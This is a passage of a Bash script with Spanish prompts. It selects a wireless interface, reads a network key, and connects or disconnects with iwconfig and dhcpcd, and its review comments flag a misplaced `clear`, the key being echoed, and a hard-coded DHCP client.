# Ask which interface to use for connecting to the target network, then go
# back to the connection menu.
# Globals: INTERFACES, WIFI3 (written); Host_SSID (read)
# Calls:   conectmenu
function interselect {
# Two earlier ways of listing interfaces, kept commented out:
#INTERFACES=`iwconfig|grep --regexp=^[^:blank:].[:alnum:]|awk '{print $1}'`
#INTERFACES=`iwconfig|egrep "^[a-Z]+[0-9]+" |awk '{print $1}'`
# Interface names from `ip link`, dropping every name that contains "lo".
INTERFACES=`ip link |egrep "^[0-9]+" | cut -d':' -f 2 | cut -d' ' -f 2 | grep -v "lo" |awk '{print $1}'`
# NOTE(review): `clear` sits between `if` and `then`, so the branch is chosen
# by the exit status of `clear`, not by the WIFI3 test: the prompt below is
# shown whenever `clear` succeeds, even if WIFI3 is already set. optionmenu
# pre-fills WIFI3 from WIFI2, so moving `clear` would change what the
# operator sees - confirm the intended behaviour before touching it.
if [ "$WIFI3" = "" ]
clear
then
echo "Selecciona una interface en modo managed para la conexion: "
echo ""
# $INTERFACES must stay unquoted: select needs one word per interface.
select WIFI3 in $INTERFACES; do
break;
done
echo "Se usara $WIFI3 para conectar a $Host_SSID"
else
clear
fi
sleep 2
conectmenu
}
# Prompt for the network key to use when connecting.
# Globals: KEY3, KEY2 (written); Host_SSID (read)
# Calls:   conectmenu
# NOTE(review): the key is typed with echo on and then printed back in full,
# so it stays readable in the terminal scrollback until the clear below.
keyin() {
  printf '%s' "Teclee la KEY para $Host_SSID (KEY_en_HEX o s:KEY_en_ASCII): "
  read KEY3
  KEY2=$KEY3
  printf '\n'
  echo Se conectará utilizando esta contraseña: $KEY2
  sleep 2
  clear
  conectmenu
}
# Bring the connection interface up, set the ESSID, key and Managed mode,
# request a DHCP lease, then return to the connection menu.
# Globals: WIFI3, Host_SSID, KEY2 (read)
# Calls:   conectmenu
# NOTE(review): the key is passed to iwconfig as a command-line argument, and
# the DHCP client name is hard-coded here although DHCPSOFT is defined at the
# top of the script (the -nd flags are dhcpcd's) - confirm before unifying.
conect() {
  ifconfig $WIFI3 up
  # The SSID is quoted so that names with spaces reach iwconfig as one word.
  iwconfig $WIFI3 essid "$Host_SSID"
  iwconfig $WIFI3 key $KEY2
  iwconfig $WIFI3 mode Managed
  dhcpcd -nd $WIFI3
  conectmenu
}
# Drop the connection by cycling the interface down and up, then return to
# the connection menu.
# Globals: WIFI3 (read)
# Calls:   conectmenu
desconect() {
  ifconfig $WIFI3 down
  ifconfig $WIFI3 up
  conectmenu
}
function changerrate {
while true; do
clear
echo " "
echo " Cambiar RATE a... "
echo " "
echo " 1) 1M "
echo " 2) 2M "
echo " 3) 5M "
echo " 4) Auto "
echo " "
ec